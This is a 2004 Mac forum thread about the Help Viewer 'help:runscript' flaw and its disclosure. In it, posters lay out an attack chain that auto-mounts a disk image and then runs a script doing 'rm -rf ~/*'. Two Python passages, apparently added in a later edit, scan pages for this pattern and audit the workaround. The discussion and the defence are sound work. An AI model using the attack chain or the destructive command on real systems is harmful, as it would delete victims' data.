Serious Security Flaw in Mac OS X/Safari/Help Viewer (Page 2)
lixlpixel
Fresh-Faced Recruit
Join Date: May 2004
May 15, 2004, 12:08 PM
you posted this several hours ago and it already didn't work then - want to know why?

because i disabled the help application 3 months ago.

and yes - i CAN read...
JLL
Professional Poster
Join Date: Apr 1999
Location: Copenhagen, Denmark
May 15, 2004, 12:17 PM
Originally posted by lixlpixel:
do you really believe i would make that public without telling Apple ?

I LOVE APPLE

i can't sleep since i did it - i only did it because of so many "new" (more or less serious) exploits for the Mac surfaced.

(and because Apple didn't respond on my bug report for over two months)
Excuse me, but you sent a BUG REPORT??? That bug report is probably buried deep in some developer's to do list and hasn't been read by the right people yet.

Contact Apple directly at [email protected]

NOW!!!!

Next time someone feels they have to make a security hole public because Apple didn't respond to your e-mail, bug report or something like that, please read this page first:

http://www.info.apple.com/usen/security/index.html

JLL

- My opinions may have changed, but not the fact that I am right.
lixlpixel
Fresh-Faced Recruit
Join Date: May 2004
May 15, 2004, 12:34 PM
wrong - i'm a webmaster - and webmasters just love to keep logs you must know...

and someone@apple was exactly 5 hours after the bug report on the site.

and again the day after - and so on ...
JLL
Professional Poster
Join Date: Apr 1999
Location: Copenhagen, Denmark
May 15, 2004, 12:41 PM
Originally posted by lixlpixel:
wrong - i'm a webmaster - and webmasters just love to keep logs you must know...

and someone@apple was exactly 5 hours after the bug report on the site.

and again the day after - and so on ...
So you're leaning back saying "Someone at Apple has seen this - I'm certainly not going to mail Apple at [email protected]. The Apple guy can do that" ??

Just contact the right people!
Groovy
Mac Enthusiast
Join Date: Apr 2001
May 15, 2004, 12:45 PM
Originally posted by lixlpixel:
you posted this several hours ago and it already didn't work then - want to know why?

because i disabled the help application 3 months ago.

and yes - i CAN read...

but it is just the help app? Maybe other apps can be used as well.
lixlpixel
Fresh-Faced Recruit
Join Date: May 2004
May 15, 2004, 12:46 PM
well - if the category security under http://developer.apple.com/bugreporter/index.html is NOT the right place to tell this to Apple, then you might be right.
mcalmus
Fresh-Faced Recruit
Join Date: Oct 2003
May 15, 2004, 12:53 PM
This vulnerability is obviously an operating system level bug since it seems to affect most (all?) web browsers. I was able to execute the test cases within Mozilla and have filed a security report with them in case Apple is slow at fixing it.
Groovy
Mac Enthusiast
Join Date: Apr 2001
May 15, 2004, 12:59 PM
Originally posted by mcalmus:
This vulnerability is obviously an operating system level bug since it seems to affect most (all?) web browsers. I was able to execute the test cases within Mozilla and have filed a security report with them in case Apple is slow at fixing it.
interesting.

I wonder if there are any other protocols that could be used.

We know "help:" works, but what about all the others?
JLL
Professional Poster
Join Date: Apr 1999
Location: Copenhagen, Denmark
May 15, 2004, 01:02 PM
Originally posted by lixlpixel:
well - if the category security under http://developer.apple.com/bugreporter/index.html is NOT the right place to tell this to Apple , then you might be right.
You're a stubborn little guy aren't you? Just send the mail.
lixlpixel
Fresh-Faced Recruit
Join Date: May 2004
May 15, 2004, 01:13 PM
i have - this morning. (sent an email)

and yesterday i wrote already
and last tuesday another ...

look - i gain nothing but bad karma from this anyway, so i didn't do this for fun, but because i have a lot of friends who don't mind if things get downloaded and mounted and activated around them - because they trust (like me) in apple - and then they wonder why some files are missing.

and i simply didn't want to wait until someone makes a bad surprise out of that.
theolein
Addicted to MacNN
Join Date: Feb 2001
Location: zurich, switzerland
May 15, 2004, 01:22 PM
Originally posted by JLL:
Excuse me, but you sent a BUG REPORT??? That bug report is probably buried deep in some developer's to do list and hasn't been read by the right people yet.

Contact Apple directly at [email protected]

NOW!!!!

Next time someone feels they have to make a security hole public because Apple didn't respond to your e-mail, bug report or something like that, please read this page first:

http://www.info.apple.com/usen/security/index.html

HEY, WHO the fu©k asked you to be Apple's Nazi? Get off his case already, don't kill the messenger.

For the protection of our customers, Apple does not disclose, discuss or confirm security issues until a full investigation has occurred and any necessary patches or releases are available. Apple usually distributes information about security issues in its products through this site and the mailing list below.
For the protection of their customers, my arse. Bloody chickens can't even be honest here, of all places.

In any case, we'll see how long it takes Apple to move their fat arses after Slashdot gets on their case.
weird wabbit
Person Man
Professional Poster
Join Date: Jun 2001
Location: Northwest Ohio
May 15, 2004, 01:41 PM
Originally posted by theolein:
For the protection of their customers, my arse. Bloody chickens can't even be honest here, of all places.
This is standard operating procedure for most companies whenever a security bug is found. Let them do their job, properly.
theolein
Addicted to MacNN
Join Date: Feb 2001
Location: zurich, switzerland
May 15, 2004, 01:45 PM
Originally posted by Person Man:
This is standard operating procedure for most companies whenever a security bug is found. Let them do their job, properly.
Bullsh©t, if they would do their job properly we wouldn't be discussing this right now.
Person Man
Professional Poster
Join Date: Jun 2001
Location: Northwest Ohio
May 15, 2004, 01:47 PM
Originally posted by theolein:
Bullsh©t, if they would do their job properly we wouldn't be discussing this right now.
Would you rather have a *proper* fix done right and released in a week's (or longer) time, or a half-assed job done quickly right now that isn't properly tested that may have the potential to break huge parts of the operating system (or worse, introduce an even BIGGER security hole)?
theolein
Addicted to MacNN
Join Date: Feb 2001
Location: zurich, switzerland
May 15, 2004, 01:51 PM
Originally posted by Person Man:
Would you rather have a *proper* fix done right and released in a week's time, or a half-assed job done quickly right now that isn't properly tested that may have the potential to break huge parts of the operating system (or worse, introduce an even BIGGER security hole)?
Believe me, and I'm not alone here, I have a difficult time imagining a larger or more dangerous hole than this one. Running rm -rf / as root comes to mind, though
Person Man
Professional Poster
Join Date: Jun 2001
Location: Northwest Ohio
May 15, 2004, 02:00 PM
Originally posted by theolein:
Believe me, and I'm not alone here, I have a difficult time imagining a larger or more dangerous hole than this one. Running rm -rf / as root comes to mind, though
I know. I'm not trying to minimize the danger. If you look, though, Apple is usually (key word) pretty quick about quickly fixing legitimate security holes (and this one is pretty darn legitimate, if you ask me).

The trojans that Intego has gone apesh*t over aren't legitimate security "holes" and as such there is not much one can do to prevent that sort of thing (without making increasingly elaborate hoops for the user to jump through as the trojan writers find a way to socially engineer their way around them).

But, Apple should also be able to fix this hole properly without breaking the useful functionality of being able to automate things from the help system (via AppleScript) for inexperienced users and without breaking other applications' ability to launch the help viewer using the "help://" URL system. (Like say, control-clicking on a button in a program could open the help page explaining what that control does, for example... easy to program in this way).

Again, Apple has traditionally been fairly responsive in fixing legitimate security holes in the past and I have no reason to believe that they will not act in a timely fashion in this case either. (EDIT: Well, if it was reported to them in February, then they do need to do something now).

In any case, jumping up and down and using little copyright symbols to get around the profanity filters in these forums is going to do absolutely NOTHING to fix the problem. Which should have been fixed *yesterday*.
( Last edited by Person Man; May 15, 2004 at 03:34 PM. )
Tijer
Fresh-Faced Recruit
Join Date: May 2004
May 15, 2004, 02:01 PM
Originally posted by theolein:
Believe me, and I'm not alone here, I have a difficult time imagining a larger or more dangerous hole than this one. Running rm -rf / as root comes to mind, though
Yeah, this is crazy. I never thought Apple would be so stupid. This is extremely sad and ruins a perfect argument for choosing OS X over Windows.

But what's up with the disk:// thing? I don't see it being run automatically when I press the link? Wasn't it supposed to do that if it's an exploit?

Greets,
Tijer
There's more to this signature than you think.
Person Man
Professional Poster
Join Date: Jun 2001
Location: Northwest Ohio
May 15, 2004, 02:11 PM
Originally posted by Tijer:
Yeah, this is crazy. I never thought Apple would be so stupid. This is extremely sad and ruins a perfect argument for choosing OS X over Windows.
Nobody said the OS was perfect. EVERY operating system has security holes. Apple is no more immune than the rest of them. That doesn't mean they are stupid.

This is nothing more than a design oversight that became a huge security hole. When they designed the help system (read my post above to see why it's designed the way it is), and the ability to automatically mount a disk image from the browser, they probably never even thought about the fact that someone might combine those two things with a browser refresh command to do bad things. Each piece of the exploit was probably developed separately, too.

Before 9/11, *most people* (key words) probably *never* thought that terrorists would hijack planes and crash them into the World Trade Center, Pentagon (and potentially even the White House or Capitol Building).

Same thing here. People make mistakes, and even when you're being more security-conscious from the beginning (like Apple generally does), you are *never* going to eliminate the possibility that any new feature that you introduce, no matter how benign it may be by itself, could be combined with another, equally benign feature by itself, to produce a serious security threat.

To suggest that Apple is immune from these things (as your statement "perfect argument" suggests) is ludicrous.
Person Man
Professional Poster
Join Date: Jun 2001
Location: Northwest Ohio
May 15, 2004, 02:15 PM
Originally posted by Tijer:
But what's up with the disk:// thing? I don't see it being run automatically when I press the link? Wasn't it supposed to do that if it's an exploit?
The disk:// thing by itself won't cause the problem. You have to combine three separate things to have the full hole.

One: a disk image with the malicious code on it. (get the user to download it)
Two: issue a meta-refresh of the page after the image is downloaded (should be able to be accomplished with the right URL)
Three: as part of the refresh of the page, the <help:// ... run script (known path to malicious code on image)> command executes the malicious code on the image.

Three pieces of functionality that, by themselves, don't present anywhere near as much of a threat as the three of them combined together.
theolein
Addicted to MacNN
Join Date: Feb 2001
Location: zurich, switzerland
May 15, 2004, 02:21 PM
Originally posted by Tijer:
Yeah, this is crazy. I never thought Apple would be so stupid. This is extremely sad and ruins a perfect argument for choosing OS X over Windows.

But what's up with the disk:// thing? I don't see it being run automatically when I press the link? Wasn't it supposed to do that if it's an exploit?

Greets,
Tijer
That's because my server is slashdotted or something, if you mean the link I posted.
Tijer
Fresh-Faced Recruit
Join Date: May 2004
May 15, 2004, 02:24 PM
Originally posted by theolein:
That's because my server is slashdotted or something, if you mean the link I posted.
No no, it's working fine and mounting and everything. But nothing happens until I press the Applescript. Now that isn't really an exploit is it?
theolein
Addicted to MacNN
Join Date: Feb 2001
Location: zurich, switzerland
May 15, 2004, 02:28 PM
Originally posted by Person Man:
I know. I'm not trying to minimize the danger. If you look, though, Apple is usually (key word) pretty quick about quickly fixing legitimate security holes (and this one is pretty darn legitimate, if you ask me).

The trojans that Intego has gone apesh*t over aren't legitimate security "holes" and as such there is not much one can do to prevent that sort of thing (without making increasingly elaborate hoops for the user to jump through as the trojan writers find a way to socially engineer their way around them).

But, Apple should also be able to fix this hole properly without breaking the useful functionality of being able to automate things from the help system (via AppleScript) for inexperienced users and without breaking other applications' ability to launch the help viewer using the "help://" URL system. (Like say, control-clicking on a button in a program could open the help page explaining what that control does, for example... easy to program in this way).

Again, Apple has traditionally been fairly responsive in fixing legitimate security holes in the past and I have no reason to believe that they will not act in a timely fashion in this case either.

In any case, jumping up and down and using little copyright symbols to get around the profanity filters in these forums is going to do absolutely NOTHING to fix the problem. Which should have been fixed *yesterday*.
Fu©k that. If you think that being PC is going to resolve this any quicker, then you're welcome. A story on slashdot, on the other hand, is sure to put a little fire under Apple's overweight arse.

I don't care if Apple has traditionally been better. I pay Apple for their hardware and software, not the other way around. When they pay me to be polite and shut up, then I will, not before.

I will never understand the zealotry that goes on on this platform.
Developer (op)
Addicted to MacNN
Join Date: Apr 2001
Location: europe
May 15, 2004, 02:33 PM
Originally posted by Tijer:
No no, it's working fine and mounting and everything. But nothing happens until I press the Applescript. Now that isn't really an exploit is it?
Imagine an image gallery with "Next" image links. Silently mount the disk image in the background. The 3rd or so "Next" link is to the Help Viewer URL. How many people would notice before clicking the link? Could be a lot of deleted home folders.
Originally posted by theolein:
A story on slashdot, on the other hand, is sure to put a little fire under Apple's overweight arse.
The heise article should take care of that already.
Nasrudin sat on a river bank when someone shouted to him from the opposite side: "Hey! how do I get across?" "You are across!" Nasrudin shouted back.
theolein
Addicted to MacNN
Join Date: Feb 2001
Location: zurich, switzerland
May 15, 2004, 02:36 PM
Originally posted by Tijer:
No no, it's working fine and mounting and everything. But nothing happens until I press the Applescript. Now that isn't really an exploit is it?
It is. Think for a second: A malicious scriptkiddy posts a page on a site that has a Meta refresh tag with a disk:// url in it that automatically mounts a disk image in the background. That disk image always mounts under /Volumes, i.e. the path is known. On that disk image is an Applescript with a simple command in it: do shellscript="rm -rf ~/*". Now on the same webpage that automounted the diskimage in the background, there is a link that says, say, "Click here for naked Asian chicks" or something. The link however, is a url of the type help:runscript=/Volumes/TheDiskImage/TheAppleScript.scpt and once you click it, all your user data is gone, for good.

It is a vulnerability, and a serious one too.
Tijer
Fresh-Faced Recruit
Join Date: May 2004
May 15, 2004, 02:45 PM
Originally posted by theolein:
It is. Think for a second: A malicious scriptkiddy posts a page on a site that has a Meta refresh tag with a disk:// url in it that automatically mounts a disk image in the background. That disk image always mounts under /Volumes, i.e. the path is known. On that disk image is an Applescript with a simple command in it: do shellscript="rm -rf ~/*". Now on the same webpage that automounted the diskimage in the background, there is a link that says, say, "Click here for naked Asian chicks" or something. The link however, is a url of the type help:runscript=/Volumes/TheDiskImage/TheAppleScript.scpt and once you click it, all your user data is gone, for good.

It is a vulnerability, and a serious one too.
I see your point. I thought we were talking about two different types of vuln. so solving the help:runscript thing would solve the other.

For now I will go with altering the help: url to Chess, but I will be sad if apple does not have a fix within 2-3 days. This _is_ serious. I agree on that (as mentioned in my previous post).
Person Man
Professional Poster
Join Date: Jun 2001
Location: Northwest Ohio
May 15, 2004, 02:53 PM
Originally posted by theolein:

I will never understand the zealotry that goes on on this platform.
I'm not trying to be a zealot. I, like you, think that the problem needs to be fixed, and it needs to be fixed very quickly. But jumping up and down isn't going to solve anything in the end (and you'll just be out of energy in the end).

The only thing that the media exposure *may* do, is increase the possibility of a half-assed attempt at a fix. Or, Apple could just address the hype by saying they're aware of the problem and are working on a fix and be patient, because it's coming.

Now, please explain to me how that makes me a "zealot."
CharlesS
Posting Junkie
Join Date: Dec 2000
May 15, 2004, 03:00 PM
Originally posted by Developer:
CharlesS, this has nothing to do with the OpnApp.scpt

Deleting the OpnApp.scpt does NOT protect you from this vulnerability!

Neither does it help to modify the OpnApp.scpt or to delete the MacHelp.help as lixlpixel suggests.
HelpViewer will execute any script that it is told to execute in the URL. If the URL is known and fixed this can be exploited. And the URL of a script on a mounted volume is known.

The following link will open the "Current Date & Time.scpt" for example without the use of the OpenApp.scpt

help:runscript=../../Scripts/Info Scripts/Current Date & Time.scpt
My God, you're right. It just gets worse and worse. I can't believe this thing is able to execute any script anywhere on the system, without it even being in the /Library/Documentation/Help folder!

You're right, the thing to do is to change the help: protocol to point to Chess using More Internet (by Diggory Laycock, on the boards - his signature has the link). I'm not sure why deleting the protocol didn't work, but changing it certainly has.
( Last edited by CharlesS; May 15, 2004 at 03:21 PM. )

Ticking sound coming from a .pkg package? Don't let the .bom go off! Inspect it first with Pacifist. Macworld - five mice!
Stradlater
Professional Poster
Join Date: Oct 2002
Location: Off the Tobakoff
May 15, 2004, 03:12 PM
Originally posted by theolein:
Damn straight there, Spliff. More sh©t like this from Apple and my next machine will be a PC.
"You rise," he said, "like Aurora."
zen jihad
Registered User
Join Date: May 2004
Location: Just a groove in "G"
May 15, 2004, 03:13 PM
It's funny being a cross-platform user. You get to see people kick the cr@p out of MS for actually patching a vulnerability before a virus takes hold. Then to see Apple do nothing about theirs, and some people applauding them for being such visionaries.
Person Man
Professional Poster
Join Date: Jun 2001
Location: Northwest Ohio
May 15, 2004, 03:20 PM
Most of my whole argument rendered moot upon a little more checking. Sorry.
( Last edited by Person Man; May 15, 2004 at 03:31 PM. )
CharlesS
Posting Junkie
Join Date: Dec 2000
May 15, 2004, 03:23 PM
^ The original poster said he contacted Apple in February about this. Now it is May. 2-3 months should be enough time to properly address the problem, I would think.

Person Man
Professional Poster
Join Date: Jun 2001
Location: Northwest Ohio
May 15, 2004, 03:25 PM
Ok. The first link says that he notified Apple on February 23 of the flaw. I still wonder if he followed the "official" channels, and if he did, the issue should have been addressed by now.

But I bet the majority of us didn't know about this until yesterday, which is when the second article above was written.

Now that we know about it, we're able to imagine and test other possibilities which make the problem more urgent to fix.
Person Man
Professional Poster
Join Date: Jun 2001
Location: Northwest Ohio
May 15, 2004, 03:27 PM
Originally posted by CharlesS:
^ The original poster said he contacted Apple in February about this. Now it is May. 2-3 months should be enough time to properly address the problem, I would think.
True enough.

Now, would a zealot have conceded your point so easily? I don't think so. Everyone makes mistakes. Even me.
Developer (op)
Addicted to MacNN
Join Date: Apr 2001
Location: europe
May 15, 2004, 03:28 PM
Originally posted by CharlesS:
I can't believe this thing is able to execute any script anywhere on the system, without it even being in the /Library/Documentation/Help folder!
It has to. Most help files are not within /Library/Documentation/Help/ but within the application bundle. So they can be anywhere.
Sheep
Junior Member
Join Date: Jun 2002
Location: Belgium
May 15, 2004, 03:28 PM
Originally posted by Person Man:
Anyone ever stop to think about why you can execute AppleScripts from a URL in Help Viewer?

There are places in help files where the help files can offer to show users how to do things, or to open things for other users, for example, "To change system volume, you need to open System Preferences, click on..." Usually, you can find a link that says, "Open System Preferences for me." This system can be used to automate many things for the user, from within help. Very nice for people who aren't as experienced as many of us are.

Help Viewer files are simple HTML files. Apple made a few extensions, such as the runscript URL, so that the above functionality could be made possible.

Now consider for a moment how Safari got the ability to execute the runscript URL from Help Browser. In Panther, at least (I don't know about Jaguar), Help Viewer uses WebCore to render its pages just like Safari does... in fact, you can do the runscript command from any browser that uses the system-wide native WebCore. I find it interesting that Help Viewer launches, but I suspect that that has to do with the fact that Apple has specified by default that the prefix help:// means launch Help Viewer.

Now, how to best fix it? I don't know. The best fix would prevent it from being accessed from a web browser, but not destroy the functionality that it brings to Help Viewer.

It's a very big problem, yes, and one that needs to be fixed, but let's try coming up with solutions that allow for functionality to be preserved, but to limit it in some way to the context it was originally designed for (i.e. you shouldn't be able to launch help browser to run a script from within Safari or any other web browser).
That can probably be solved with a simple if test in WebCore.

As for this whole security flaw, this is indeed fu©ked up.
( Last edited by Sheep; May 15, 2004 at 03:40 PM. )
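The "simple if test" Sheep mentions, together with the three-part chain Person Man and theolein describe (meta refresh to a disk:// URL, then a link to a help:runscript URL), is the defender's side of this thread: web content should never be able to drive a local protocol handler, and a gateway or crawler should be able to spot pages that try. The following is an added example written for this edit, not code from the thread, from Apple or from WebCore. It assumes a constructed sample page, a placeholder host (host.invalid) and illustrative scheme lists; a real renderer would read the allow-list from configuration and apply the dispatch check at the point where it hands a URL to an external handler.

```python
"""Detection and dispatch checks for web content that targets local URL handlers."""
from html.parser import HTMLParser
from typing import List, Tuple

# Schemes ordinary web content may navigate to (illustrative allow-list).
WEB_SCHEMES = frozenset({"http", "https", "ftp", "mailto"})

# Schemes named in the thread that hand a URL to a local application.
# Illustrative; a deployment would load this from configuration.
LOCAL_HANDLER_SCHEMES = frozenset({"help", "disk"})

# Characters browsers strip from the ends of a URL before parsing it.
_C0_AND_SPACE = "".join(chr(i) for i in range(0x21))


def scheme_of(url: str) -> str:
    """Return the lower-cased scheme of a URL, or "" for scheme-less URLs.

    Leading/trailing controls and spaces are stripped and the comparison is
    case-insensitive, the same way a browser parses it; otherwise a value such
    as " HELP:..." would slip past a naive prefix check.
    """
    cleaned = url.strip(_C0_AND_SPACE).replace("\t", "").replace("\n", "").replace("\r", "")
    head, sep, _ = cleaned.partition(":")
    if not sep or not head or not head[0].isalpha():
        return ""
    if not all(c.isalnum() or c in "+-." for c in head):
        return ""
    return head.lower()


def refresh_target(content: str) -> str:
    """Extract the URL from a <meta http-equiv="refresh" content="..."> value.

    Accepts "5", "0;url=...", "0; URL='...'"; returns "" when no URL is present.
    """
    _, sep, rest = content.partition(";")
    if not sep:
        return ""
    rest = rest.strip()
    if rest[:4].lower() == "url=":
        rest = rest[4:].strip()
    return rest.strip("'\"")


class _NavigationCollector(HTMLParser):
    """Collect (how, url) for every navigation a page can trigger on its own."""

    def __init__(self) -> None:
        super().__init__()
        self.found: List[Tuple[str, str]] = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            url = refresh_target(a.get("content", ""))
            if url:
                self.found.append(("meta-refresh", url))
        elif tag in ("a", "area") and "href" in a:
            self.found.append(("link", a["href"]))
        elif tag in ("iframe", "frame") and "src" in a:
            self.found.append(("frame", a["src"]))
        elif tag == "form" and "action" in a:
            self.found.append(("form", a["action"]))


def risky_navigations(html: str) -> List[Tuple[str, str, str]]:
    """Return (how, scheme, url) for each navigation target outside WEB_SCHEMES.

    Scheme-less (relative) URLs stay on the web origin and are not reported.
    """
    parser = _NavigationCollector()
    parser.feed(html)
    parser.close()
    return [
        (how, scheme, url)
        for how, url in parser.found
        for scheme in [scheme_of(url)]
        if scheme and scheme not in WEB_SCHEMES
    ]


def allow_dispatch(url: str, from_web_content: bool) -> bool:
    """Decide whether a URL may be handed to its protocol handler.

    Local-handler schemes are honoured only when the request did not come from
    web content (e.g. an application opening its own help page). Unknown
    schemes fail closed for web content.
    """
    scheme = scheme_of(url)
    if scheme == "" or scheme in WEB_SCHEMES:
        return True
    return not from_web_content


# Constructed sample page; placeholder host and paths, not a real page.
SAMPLE_PAGE = """<html><head>
<meta http-equiv="refresh" content="0; url=disk://host.invalid/image.dmg">
</head><body>
<a href="gallery.html?img=2">Next</a>
<a href="HELP:runscript=/Volumes/Image/script.scpt">Next</a>
<a href="https://host.invalid/about">About</a>
</body></html>"""

if __name__ == "__main__":
    for how, scheme, url in risky_navigations(SAMPLE_PAGE):
        print(f"{how:13s} {scheme:6s} {url}")
```

Run stand-alone, the scanner reports the meta refresh to the disk scheme and the upper-cased HELP link, and ignores the relative and https links. The dispatch check is deliberately two-sided: the same help: URL that is refused when it arrives from a web page is still allowed when an application asks for it, which is the functionality Person Man wants preserved.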
CharlesS
Posting Junkie
Join Date: Dec 2000
May 15, 2004, 04:48 PM
Originally posted by Person Man:
Nobody said the OS was perfect. EVERY operating system has security holes. Apple is no more immune than the rest of them. That doesn't mean they are stupid.

This is nothing more than a design oversight that became a huge security hole. When they designed the help system (read my post above to see why it's designed the way it is), and the ability to automatically mount a disk image from the browser, they probably never even thought about the fact that someone might combine those two things with a browser refresh command to do bad things. Each piece of the exploit was probably developed separately, too.

Before 9/11, *most people* (key words) probably *never* thought that terrorists would hijack planes and crash them into the World Trade Center, Pentagon (and potentially even the White House or Capitol Building).

Same thing here. People make mistakes, and even when you're being more security-conscious from the beginning (like Apple generally does), you are *never* going to eliminate the possibility that any new feature that you introduce, no matter how benign it may be by itself, could be combined with another, equally benign feature by itself, to produce a serious security threat.

To suggest that Apple is immune from these things (as your statement "perfect argument" suggests) is ludicrous.
If it were something like a buffer overflow or whatever, you would have a point. But:

1. Being able to execute AppleScripts in a URL? You mean to tell me no one could think of why that would be dangerous?

2. Microsoft already did this, and there was a huge security hole because of it as well. It was well known, and old news, and this is why your 9/11 argument is invalid. This is more equivalent to having piss-poor airport security AFTER 9/11, with the result being another plane crashing into a building. "Oh, how could they have known?" doesn't work in this case.

Person Man
Professional Poster
Join Date: Jun 2001
Location: Northwest Ohio
May 16, 2004, 12:15 AM
Originally posted by CharlesS:
If it were something like a buffer overflow or whatever, you would have a point. But:

1. Being able to execute AppleScripts in a URL? You mean to tell me no one could think of why that would be dangerous?

2. Microsoft already did this, and there was a huge security hole because of it as well. It was well known, and old news, and this is why your 9/11 argument is invalid. This is more equivalent to having piss-poor airport security AFTER 9/11, with the result being another plane crashing into a building. "Oh, how could they have known?" doesn't work in this case.
Well, maybe, and maybe not.

Regardless, none of us will ever know for sure, but because history has shown us that, as a group, we tend to make the same mistakes over and over again, it's conceivable that a different type of "oh, how could they have known?" argument could apply.

Event A happens in history. Later, a similar set of circumstances suggests Course B as a solution to the new problem... then you get two groups of people... one group (group 1) says, "that will never work. Course B will lead to the same type of thing as event A." Group 2 says, "no. that will never happen, because this is different." Usually, Group 2 is the one that ends up winning the argument and carries out Course B. What generally ends up happening is that Course B leads to a similar event as Event A, and then Group 2 says, "I don't get it. Things were different. It wasn't supposed to turn out that way." Then Group 1 says, "I told you so."

So, maybe the following scenario is more likely.

(Group of Apple engineers talking about Help Viewer)

Person 1: "The help files will be based on HTML, instead of the proprietary scripting language we used in the old Apple Guide system."
Person 2: "How will we automate tasks for inexperienced users from within Help Files?"
Person 1: "Easy. We'll use AppleScript, just like we did with Apple Guide"
Person 2: "Now wait, you're going to let HTML code execute an AppleScript?"
Person 1: "Sure. Why not?"
Person 2: "Well, Microsoft allowed you to execute scripts from webpages and bad people started taking advantage of that"
Person 1: "Well, this is different because Internet Explorer is designed to be a web browser. Help Viewer is not meant to browse the web. Nobody will be able to exploit it."
Person 2: "I don't know about that..."
Person 1: "Sure it is... trust me. Now, let's make it possible to use the 'load URL' feature to give programmers easy access to direct people to the appropriate section of their online help from within their programs."
Person 2: "Um... if you do that, what's going to stop people from coding webpages that use that feature to launch Help Viewer and then use that to launch an AppleScript? How is that different from the Microsoft flaw?"
Person 1: "Uh, didn't you hear what I said earlier? We're not Microsoft. This is still different enough."
Person 2: "No, it's not."
Person 1: "Yes it is..."
<further arguing>
Person 2: (just to get person 1 to shut up) "OK, fine. Have it your way! But don't say I didn't warn you."

Perhaps the real reason that we don't have a fix yet after 2-3 months is because Person 1 and Person 2 are now having this discussion:

Person 2: "I TOLD you so!"
Person 1: "But how could this have happened? It's totally different."
Person 2: "Well, apparently it wasn't."
Person 1: "Yes it was."
Person 2: "No it wasn't."
<endless finger pointing happens before anyone actually fixes it>

When you put it into this type of context, it's easier to see how Apple may have arrived at the same place Microsoft did even AFTER the problem with Microsoft's implementation was well known. In this case you can't really say that Apple is worse than Microsoft. You can't say that Apple was better than Microsoft.

At best, you can say that, in the end, Apple and Microsoft aren't any better or worse than each other. Of course, some people will still probably label me a "zealot" for saying this. But a zealot would still be trying to defend Apple more than I am. Now that I have actually bothered to look at the very first link in the very first post in this thread, I've changed my mind to be more in line with everyone else's. But I'm still trying to be a bit more realistic. (in my not so humble opinion).
     
Person Man
Professional Poster
Join Date: Jun 2001
Location: Northwest Ohio
Status: Offline
Reply With Quote
May 16, 2004, 12:24 AM
 
Oh yeah. I just thought of something...

This will provide us with a more compelling argument against those people who insist on enabling the root account and using that as their primary account.

This is not the be-all-end-all super security hole. There are still others that haven't been found. This may be the most dangerous one to date, but even so, if you're a regular user or admin user, the flaw can't erase your whole computer unless you're logged in as root.

I know, you could have the AppleScript use "sudo," but then it would have to ask you for your password. Yes, you could probably use some creative social engineering to get around that, but it's still a bit harder to do.
     
JLL
Professional Poster
Join Date: Apr 1999
Location: Copenhagen, Denmark
Status: Offline
Reply With Quote
May 16, 2004, 05:37 AM
 
Originally posted by theolein:
HEY, WHO the fuck asked you to be Apple's Nazi? Get off his case already, don't kill the messenger.

STFU!! I just told him to send an email to the right address.

I want this fixed, and I've sent an email too.
JLL

- My opinions may have changed, but not the fact that I am right.
     
Link
Professional Poster
Join Date: Jun 2003
Location: Hyrule
Status: Offline
Reply With Quote
May 16, 2004, 06:47 AM
 
Apple won't be respected as a computer company until they use the word "solution" too damn much and put buzzwords all over their OS.
Aloha
     
theolein
Addicted to MacNN
Join Date: Feb 2001
Location: zurich, switzerland
Status: Offline
Reply With Quote
May 16, 2004, 07:57 AM
 
Update: Since this is already on Heise, and Heise is one of the most respected IT publishers, and most well read in German speaking countries, I decided to submit the story to Slashdot, along with a detailed explanation as well as, and this is the important part, the workaround to change the .help setting to point to Chess (Also asked them to mirror the discoverer's URL so as not to slashdot his server). The reason I did this is because once it's on Heise it means that it will be common knowledge very soon (As Spliffdaddy pointed out, if he knows, and he doesn't even own a Mac or speak German, then everyone knows) and that having a workaround known and available is imperative until Apple decides to fix this.

I apologise to those who think one should keep quiet, but I simply don't see the logic behind that in this case where the vulnerability is already public knowledge.
weird wabbit
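The workaround theolein refers to (repointing the ".help setting", i.e. the handler for the help: URL scheme, away from Help Viewer to a harmless application such as Chess) is only useful if it is actually in effect on each machine. The script below is an added example, not code from this thread or from Apple, that audits that binding. It assumes the per-user LaunchServices preference file at ~/Library/Preferences/com.apple.LaunchServices.plist with an LSHandlers array whose entries carry LSHandlerURLScheme and LSHandlerRoleAll keys, and assumes bundle identifiers com.apple.helpviewer for Help Viewer and com.apple.Chess for Chess; those names are assumptions, and the plist content it runs against is constructed inline so it works offline.

```python
import os
import plistlib

# Constructed sample in the shape of the per-user LaunchServices preference
# file (assumed layout and key names, not taken from the thread): help: is
# still bound to Help Viewer here, which is the exposed state.
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>LSHandlers</key>
  <array>
    <dict>
      <key>LSHandlerURLScheme</key>
      <string>help</string>
      <key>LSHandlerRoleAll</key>
      <string>com.apple.helpviewer</string>
    </dict>
    <dict>
      <key>LSHandlerURLScheme</key>
      <string>http</string>
      <key>LSHandlerRoleAll</key>
      <string>com.apple.safari</string>
    </dict>
  </array>
</dict>
</plist>
"""

# The same constructed file after the workaround: help: now opens Chess.
SAMPLE_PLIST_REDIRECTED = SAMPLE_PLIST.replace(
    b"com.apple.helpviewer", b"com.apple.Chess")

SAFE_HANDLER = "com.apple.Chess"  # assumed bundle id of the decoy app (Chess)


def url_scheme_handlers(plist_bytes):
    """Map every URL scheme listed under LSHandlers to its handler bundle id."""
    data = plistlib.loads(plist_bytes)
    handlers = {}
    for entry in data.get("LSHandlers", []):
        scheme = entry.get("LSHandlerURLScheme")
        if scheme:
            handlers[scheme.lower()] = entry.get("LSHandlerRoleAll", "")
    return handlers


def audit_help_scheme(plist_bytes, safe_handler=SAFE_HANDLER):
    """Return (verdict, handler) for the help: scheme.

    'unset'      - no per-user override, so the system default (Help Viewer)
                   applies and a web page can still open it through help:
    'redirected' - help: is bound to the harmless app chosen as the workaround
    'exposed'    - help: is bound to Help Viewer or some other unexpected app
    """
    handler = url_scheme_handlers(plist_bytes).get("help")
    if handler is None:
        return ("unset", None)
    if handler == safe_handler:
        return ("redirected", handler)
    return ("exposed", handler)


def audit_user_prefs(path=os.path.expanduser(
        "~/Library/Preferences/com.apple.LaunchServices.plist")):
    """Audit the live preference file (assumed path); absent file means no override."""
    if not os.path.exists(path):
        return ("unset", None)
    with open(path, "rb") as fh:
        return audit_help_scheme(fh.read())


if __name__ == "__main__":
    for label, blob in (("before", SAMPLE_PLIST), ("after", SAMPLE_PLIST_REDIRECTED)):
        verdict, handler = audit_help_scheme(blob)
        print(f"{label} workaround: help: -> {handler} ({verdict})")
```

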